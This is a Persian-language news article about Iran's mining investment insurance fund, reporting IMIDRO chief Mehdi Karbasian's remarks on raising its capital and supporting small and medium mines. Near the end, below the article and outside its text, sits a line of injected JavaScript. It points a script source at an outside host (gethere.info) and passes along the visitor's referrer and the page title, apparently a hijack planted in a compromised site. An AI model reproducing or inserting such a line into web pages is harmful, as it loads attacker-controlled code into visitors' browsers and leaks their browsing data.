پنج شنبه , 23 آذر 1396
خانه / اخبار اقتصادی / اقتصاد ایران / افزایش سرمایه صندوق بیمه فعالیت‌های معدنی

افزایش سرمایه صندوق بیمه فعالیت‌های معدنی

رئیس هیات عامل ایمیدرو ابراز امیدواری کرد: افزایش سرمایه ۲۵ میلیون دلاری برای صندوق بیمه سرمایه گذاری فعالیت های معدنی در قانون بودجه ۹۴ برای دستیابی به اهداف توسعه ای این بخش محقق شود.

به گزارش خبرگزاری مهر، مهدی کرباسیان در جلسه امضای تفاهم نامه همکاری شرکت ملی صنایع مس و صندوق بیمه سرمایه گذاری فعالیت‌های معدنی با اشاره به اینکه حمایت از معادن کوچک و متوسط بخش خصوصی جزو وظایف ایمیدرو محسوب می شود، اظهار داشت: صندوق بیمه سرمایه گذاری فعالیت های معدنی بهترین شیوه برای حمایت از معدنکاران بخش خصوصی است که برای تقویت آن، ساختار صندوق با هدف حمایت از معادن در حوزه اکتشاف، استخراج و فرآوری اصلاح شد.

وی ادامه داد: اصلاح سرمایه صندوق از دیگر اقدامات صورت گرفته توسط ایمیدرو بود که مصوبه افزایش سرمایه از ۱۰۰ میلیارد ریال به ۶۸۰ میلیارد ریال در سال گذشته از سوی هیات وزیران به تصویب رسید و در مرحله بعد به ۲۰۰۰ میلیارد ریال برسد. تاکنون ۲۵۰ میلیارد ریال به صندوق واریز شده است و معتقدیم با توجه به گستردگی فعالیت های معدنی و حجم فرصت های سرمایه گذاری، این میزان سرمایه تصویب شده باید به چند برابر افزایش یابد.

کرباسیان خاطرنشان کرد: اکنون در آستانه تدوین برنامه ششم توسعه اقتصادی هستیم و خوشبختانه بخش معدن به عنوان یک بخش اقتصادی ایجاد کننده ارزش افزوده وسیع و اشتغال بالا، مورد توجه دولت و مجلس قرار گرفته است و سازمان مدیریت و برنامه ریزی نیز این موضوع را به طور جدی دنبال می کند.

رئیس هیات عامل ایمیدرو با اشاره به تناقضات موجود در قوانین مربوط به حمایت از بخش خصوصی، تصریح کرد: در لایحه حمایت از تولید، به سازمان های توسعه ای از جمله ایمیدرو اجازه داده شده تا ۴۹ درصد از بخش خصوصی حمایت شود اما در قانون دیگر، تنها ۲۰ درصد اجازه حمایت داده شده است. این موضوع ۲ بار در مجلس مطرح شده اما رای نیاورده و امیدواریم در قانون بودجه مطرح شود.

وی ادامه داد: اگر بخواهیم از بخش خصوصی حمایت و اصل ۴۴ قانون اساسی را اجرا کنیم، باید معادن کوچک و متوسط را مورد توجه قرار دهیم. چرا که اگر یک معدن متوسط در منطقه محروم توسعه یابد، آن منطقه رشد پیدا می کند و این امر موجب محرومیت زدایی می شود.

کرباسیان خاطرنشان کرد: در یکی از کشورهای پیشرفته دنیا، در سال ۲۰۱۰ کل ارزش مواد معدنی استخراج شده، ۶۱ میلیارد دلار بوده که با قرار گرفتن در چرخه تولید و فرآوری، این رقم به ۲۱۰۰ میلیارد دلار رسیده ضمن اینکه برای ۲۶ میلیون نفر اشتغال ایجاد کرده است.

معاون وزیر صنعت، معدن و تجارت، مسیرهای حمایتی صندوق بیمه سرمایه گذاری فعالیت های معدنی را برشمرد و گفت: نخستین مسیر حمایتی، از وجوه صندوق است که پس از بررسی و ارزیابی صلاحیت های معدن، تضمین با نرخ بسیار پایین تر از نرخ بانکی به معدن کار به ویژه در حوزه اکتشاف پرداخت می شود. مسیر دوم، از محل اعتبارات وزارتخانه و حقوق دولتی است.

وی ادامه داد: مسیر سوم، انعقاد قرارداد با بانک های ملت و تجارت است که بانک، معدن را به عنوان تضمین پذیرفته و ریسک فعالیت های معدنی را به صفر می رساند و در صورت به نتیجه نرسیدن فعالیت معدنی، خسارت های احتمالی را پرداخت می کند. این بخشنامه به تازگی اصلاح شده اما هنوز عملیاتی نشده است.

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

پاسخ دهید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *